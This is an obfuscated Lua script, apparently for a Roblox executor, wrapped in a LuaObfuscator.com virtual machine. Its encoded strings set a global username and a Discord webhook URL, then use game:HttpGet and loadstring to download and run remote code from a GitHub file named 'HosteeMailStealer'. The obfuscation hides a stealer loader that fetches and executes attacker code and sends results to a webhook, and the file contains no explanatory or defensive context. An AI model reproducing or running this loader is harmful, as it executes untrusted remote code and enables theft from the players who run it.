--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%(((1640 -(1523 + 114)) -1)^(((v33-((2 + 0) -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + (105 -31))))) ;return v82-(v82%(569 -(367 + 201))) ;else local v83=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v83 + v83))>=v83) and (1 + 0)) or (877 -(282 + 595)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=1065 -(68 + 997) ;local v35;local v36;local v37;local v38;while true do if (v34==((2347 -1077) -((414 -188) + 1044))) then v35,v36,v37,v38=v1(v16,v19,v19 + 3 );v19=v19 + ((39 -22) -13) ;v34=118 -((382 -(87 + 263)) + 85) ;end if (v34==1) then return (v38 * (16441815 + 335401)) + (v37 * (14533 + 51003)) + (v36 * (1213 -(892 + 65))) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=1180 -(1123 + 57) ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=(291 -(60 + 230))) then else local v89=0 + 0 ;while true do if (v89==(254 -(163 + 91))) then v42=nil;v43=nil;v89=1;end if (v89~=1) then else v39=1458 -(282 + 1174) ;break;end end end if (v39~=2) then else v44=nil;v45=nil;v39=1933 -(1869 + 61) ;end if (v39==(1 + 2)) then v46=nil;while true do local v91=0;while true do if (v91==(3 -2)) then if (v40~=(2 -0)) then else local v101=0 + 0 ;while true do if (v101~=1) then else for v148=1025 -(706 + 318) ,v24() do local v149=0 -0 ;local v150;local v151;local v152;local v153;while true do if ((1253 -(721 + 530))~=v149) then else while true do if (v150==1) then v153=nil;while true do if (v151==0) then local v169=0;local v170;while true do if (v169~=0) then else v170=0;while true do if (v170==(1 + 0)) then v151=1272 -(945 + 326) ;break;end if (v170==0) then local v176=0 -0 ;while true do if ((1475 -(1329 + 145))~=v176) then else v170=972 -(140 + 831) ;break;end if (v176~=(1850 -(1409 + 441))) then else v152=718 -(15 + 703) ;v153=nil;v176=1 + 0 ;end end end end break;end end end if (v151~=(1 + 0)) then else while true do if (v152==0) then v153=v22();if (v21(v153,439 -(262 + 176) ,1722 -(345 + 1376) )~=0) then else local v171=1086 -(461 + 625) ;local v172;local v173;local v174;local v175;while true do if (v171==(688 -(198 + 490))) then v172=0 -0 ;v173=nil;v171=1172 -(418 + 753) ;end if (1~=v171) then else v174=nil;v175=nil;v171=4 -2 ;end if (v171==2) then while true do if (v172==(1207 -(696 + 510))) then local v177=0 -0 ;local v178;while true do if (v177==0) then v178=1262 -(1091 + 171) ;while true do if (v178~=(1 + 0)) then else v172=1 + 1 ;break;end if (v178~=(0 -0)) then else v175={v23(),v23(),nil,nil};if (v173==(374 -(123 + 251))) then local v185=1769 -(1749 + 20) ;while true do if (v185~=(0 -0)) then else v175[1 + 2 ]=v23();v175[1326 -(1249 + 73) ]=v23();break;end end elseif (v173==(1 + 0)) then v175[3]=v24();elseif (v173==(1147 -(466 + 679))) then v175[701 -(208 + 490) ]=v24() -((1 + 1)^16) ;elseif (v173~=3) then else local v194=0 + 0 ;while true do if (v194~=0) then else v175[1903 -(106 + 1794) ]=v24() -(2^(6 + 10)) ;v175[840 -(660 + 176) ]=v23();break;end end end v178=2 -1 ;end end break;end end end if (v172~=(5 -3)) then else local v179=0 + 0 ;while true do if (v179==(202 -(14 + 188))) then local v184=675 -(534 + 141) ;while true do if (1==v184) then v179=1 + 0 ;break;end if (v184==(0 + 0)) then if (v21(v174,585 -(57 + 527) ,1428 -(41 + 1386) )==(1 + 0)) then v175[3 -1 ]=v46[v175[2 + 0 ]];end if (v21(v174,2 -0 ,2)==(1 -0)) then v175[8 -5 ]=v46[v175[2 + 1 ]];end v184=1 + 0 ;end end end if (v179~=(1 -0)) then else v172=399 -(115 + 281) ;break;end end end if (v172~=(3 + 0)) then else if (v21(v174,6 -3 ,5 -2 )~=(1 + 0)) then else v175[9 -5 ]=v46[v175[1261 -(1043 + 214) ]];end v41[v148]=v175;break;end if (v172~=(0 -0)) then else local v181=867 -(550 + 317) ;while true do if (v181==1) then v172=1 -0 ;break;end if (v181==(0 -0)) then v173=v21(v153,5 -3 ,583 -(361 + 219) );v174=v21(v153,324 -(53 + 267) ,291 -(134 + 151) );v181=1 + 0 ;end end end end break;end end end break;end end break;end end break;end if (v150==(413 -(15 + 398))) then local v165=0;while true do if (v165~=(1665 -(970 + 695))) then else v151=982 -(18 + 964) ;v152=nil;v165=1 -0 ;end if (v165==(1991 -(582 + 1408))) then v150=3 -2 ;break;end end end end break;end if (v149==(0 + 0)) then v150=0 -0 ;v151=nil;v149=1;end if (v149==1) then v152=nil;v153=nil;v149=7 -5 ;end end end v40=1827 -(1195 + 629) ;break;end if (v101==(0 -0)) then local v147=0 + 0 ;while true do if (v147~=1) then else v101=242 -(187 + 54) ;break;end if (v147==(780 -(162 + 618))) then for v161=1,v45 do local v162=0 + 0 ;local v163;local v164;while true do if (v162==(1 + 0)) then if (v163==(1 -0)) then v164=v22()~=0 ;elseif (v163==(3 -1)) then v164=v25();elseif (v163~=3) then else v164=v26();end v46[v161]=v164;break;end if (v162==(0 + 0)) then v163=v22();v164=nil;v162=1;end end end v44[4 -1 ]=v22();v147=1 + 0 ;end end end end end if (v40~=1) then else local v102=0 + 0 ;while true do if (v102~=(0 -0)) then else v44={v41,v42,nil,v43};v45=v24();v102=1;end if (v102==(1 + 0)) then v46={};v40=1123 -(118 + 1003) ;break;end end end break;end if (v91==(0 -0)) then if (v40==(4 -1)) then local v103=0 -0 ;local v104;while true do if (v103==(1384 -(746 + 638))) then v104=0 + 0 ;while true do if (v104==0) then local v159=977 -(553 + 424) ;while true do if (v159==(0 + 0)) then for v167=1,v24() do v42[v167-(1 -0) ]=v29();end return v44;end end end end break;end end end if (v40==0) then local v105=341 -(218 + 123) ;local v106;while true do if (v105==0) then v106=1581 -(1535 + 46) ;while true do if (v106==(0 + 0)) then local v160=0 + 0 ;while true do if (v160==(560 -(306 + 254))) then v41={};v42={};v160=1;end if ((1 + 0)==v160) then v106=1 + 0 ;break;end end end if (v106==1) then v43={};v40=1 + 0 ;break;end end break;end end end v91=1 -0 ;end end end break;end if (v39==(1467 -(899 + 568))) then local v90=0 + 0 ;while true do if (v90~=0) then else v40=0;v41=nil;v90=1;end if (v90~=(2 -1)) then else v39=604 -(268 + 335) ;break;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0 + 0 ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(2 -1)) then v50=(977 + 604) -(1183 + 397) ;v51=(v21(v49,1 + 0 ,96 -76 ) * ((755 -(239 + 514))^((1162 -(782 + 356)) + 8))) + v48 ;v47=1 + 1 ;end if (v47==(1331 -(797 + 532))) then v52=v21(v49,16 + 5 ,11 + 20 );v53=((v21(v49,32)==(2 -(268 -(176 + 91)))) and  -(1203 -(373 + 829))) or (732 -(476 + 255)) ;v47=1133 -(369 + 761) ;end if ((0 + 0)==v47) then v48=v24();v49=v24();v47=1662 -(1477 + 184) ;end if (v47==(5 -2)) then if (v52==(0 -0)) then if (v51==(238 -(64 + 174))) then return v53 * (0 -0) ;else v52=2 -(2 -1) ;v50=304 -(244 + 60) ;end elseif (v52==(292 + 1755)) then return ((v51==(0 -0)) and (v53 * ((337 -(144 + (282 -90)))/(216 -(42 + (1266 -(975 + 117))))))) or (v53 * NaN) ;end return v8(v53,v52-((4023 -(157 + 1718)) -(936 + 154 + 35)) ) * (v50 + (v51/((2 + 0)^(44 + 8)))) ;end end end v26=nil;function v26(v54)local v55=0 -0 ;local v56;local v57;while true do if (v55==(6 -4)) then v57={};for v92=1019 -(697 + 321) , #v56 do v57[v92]=v2(v1(v3(v56,v92,v92)));end v55=(618 -(602 + 9)) -4 ;end if (v55==1) then v56=v3(v16,v19,(v19 + v54) -(1 -(1189 -(449 + 740))) );v19=v19 + v54 ;v55=4 -2 ;end if (v55==(0 + 0)) then v56=nil;if  not v54 then local v98=0 -0 ;while true do if (v98==(0 -0)) then v54=v24();if (v54==0) then return "";end break;end end end v55=1228 -(322 + (1777 -(826 + 46))) ;end if (v55==3) then return v6(v57);end end end v18=5;end if (v18==2) then function v22()local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + (6 -4) );v19=v19 + 2 ;return (v60 * (1203 -(245 + 702))) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v61,16));if v20 then local v99=0;local v100;while true do if (v99==1) then return v100;end if (v99==0) then v100=v5(v85,v20);v20=nil;v99=1;end end else return v85;end break;end end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=7) then if (v81<=3) then if (v81<=1) then if (v81==0) then local v107=v80[2];local v108=v78[v80[3]];v78[v107 + 1 ]=v108;v78[v107]=v108[v80[4]];else v78[v80[2]]();end elseif (v81==2) then v78[v80[2]]=v64[v80[3]];else local v114=v80[2];local v115,v116=v71(v78[v114](v13(v78,v114 + 1 ,v80[3])));v73=(v116 + v114) -1 ;local v117=0;for v141=v114,v73 do v117=v117 + 1 ;v78[v141]=v115[v117];end end elseif (v81<=5) then if (v81>4) then v78[v80[2]]=v80[3];else v78[v80[2]]=v80[3];end elseif (v81==6) then v78[v80[2]]();else local v122=v80[2];local v123,v124=v71(v78[v122](v13(v78,v122 + 1 ,v80[3])));v73=(v124 + v122) -1 ;local v125=0;for v144=v122,v73 do v125=v125 + 1 ;v78[v144]=v123[v125];end end elseif (v81<=11) then if (v81<=9) then if (v81>8) then do return;end else local v126=v80[2];local v127=v78[v80[3]];v78[v126 + 1 ]=v127;v78[v126]=v127[v80[4]];end elseif (v81==10) then v78[v80[2]][v80[3]]=v80[4];else local v133=0;local v134;while true do if (v133==0) then v134=v80[2];v78[v134]=v78[v134](v13(v78,v134 + 1 ,v73));break;end end end elseif (v81<=13) then if (v81==12) then local v135=0;local v136;while true do if (v135==0) then v136=v80[2];v78[v136]=v78[v136](v13(v78,v136 + 1 ,v73));break;end end else v78[v80[2]][v80[3]]=v80[4];end elseif (v81>14) then v78[v80[2]]=v64[v80[3]];else do return;end end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!093O0003023O005F4703093O00557365724E616D6579030A3O00616C6472696E3937353203083O00576562682O6F6B7903793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313230362O3031302O3435383531383631302F61366C4B386D336D75443550754C6B4863364A716F363942446C522O454867636E553033574B504F3366304A4252744766366B5449484173784E716550696E304F523638030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O655363726970747A2F6D61696E2F486F73742O654D61696C537465616C6572000C3O0012023O00013O00300A3O000200030012023O00013O00300A3O000400050012023O00063O001202000100073O00202O000100010008001204000300094O0003000100034O000B5O00022O00013O000100012O000E3O00017O00",v9(),...);end
